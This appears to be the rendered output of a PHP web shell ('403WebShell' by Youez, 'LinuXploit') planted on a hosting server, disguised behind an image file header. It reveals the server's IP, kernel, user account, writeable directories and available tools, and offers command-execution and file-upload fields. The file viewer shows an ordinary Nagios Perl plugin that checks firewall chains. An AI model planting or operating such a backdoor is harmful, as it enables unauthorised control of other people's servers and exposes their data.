����JFIF��x�x����'403WebShell
403Webshell
Server IP : 78.140.185.180  /  Your IP : 18.218.161.96
Web Server : LiteSpeed
System : Linux cpanel13.v.fozzy.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
User : builderbox ( 1072)
PHP Version : 7.3.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/lib64/nagios/plugins/extra/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /usr/lib64/nagios/plugins/extra/check_firewall_chains
#! /usr/bin/env perl

use strict;
use Getopt::Long;
use IO::Socket::IP;

use constant {
    IPv4 => '127.0.0.1',
    IPv6 => '0000:0000:0000:0000:0000:0000:0000:0001'
};

sub usage {
    print <<"EOF";
Usage: $0 --chains 'trusted->blocked' --directions 'out->in'
    --chains        string of chains (trusted|blocked...) separated by '->'
    --directions    string of directions (-out|-in...) separated by '->'
EOF
    exit 1;
};

my $chains_argv;
my $directions_argv;

GetOptions(
  'chains=s' => \$chains_argv,
  'directions=s' => \$directions_argv
) or usage;

usage unless ( defined $chains_argv and defined $directions_argv );

my @chains = split('->', $chains_argv);
my @directions = split('->', $directions_argv);

my @expected_chains = map {
  my $direction = $_;
  map { "$_-$direction" } @chains
} @directions;

my ($last_time) = `dmesg -l7 | tail -n1` =~ /^\[([0-9]+\.[0-9]+)\]/;

IO::Socket::IP->new(
    PeerHost => $_,
    PeerPort => 65000,
    Proto    => 'tcp'
) for (IPv4, IPv6);

my %real_chains = (
    IPv4() => [],
    IPv6() => []
);
open my $dmesg_fh, '-|', 'dmesg -l7' or die $!;
while (my $line = <$dmesg_fh>) {
    my ($dmesg_time) = $line =~ /^\[([0-9]+\.[0-9]+)\]/;
    next if $last_time >= $dmesg_time;

    my ($chain, $ip) = $line =~ /\[CHECK_FW:([a-z\-]+)\].+DST=([0-9\.:]+)/;
    next unless defined $chain;
    
    push @{ $real_chains{$ip} }, $chain;
}


my $expected_str = join(' -> ', @expected_chains);

my $MSG = "\nChain for test:\n$expected_str\n";
my $EXIT = 0;

for ( [ IPv4() => 'iptables' ], [IPv6() => 'ip6tables'] ) {
    my ($ip, $iptables) = @$_;
    my $real_str = join(' -> ', @{ $real_chains{$ip} });
    $MSG .= "\nChain in $iptables:\n$real_str\n";
    unless ($expected_str eq $real_str) {
        $MSG .= "[Critical]: Chain not match\n";
        $EXIT = 2;
    }
}

print $MSG;
exit $EXIT;

Youez - 2016 - github.com/yon3zu
LinuXploit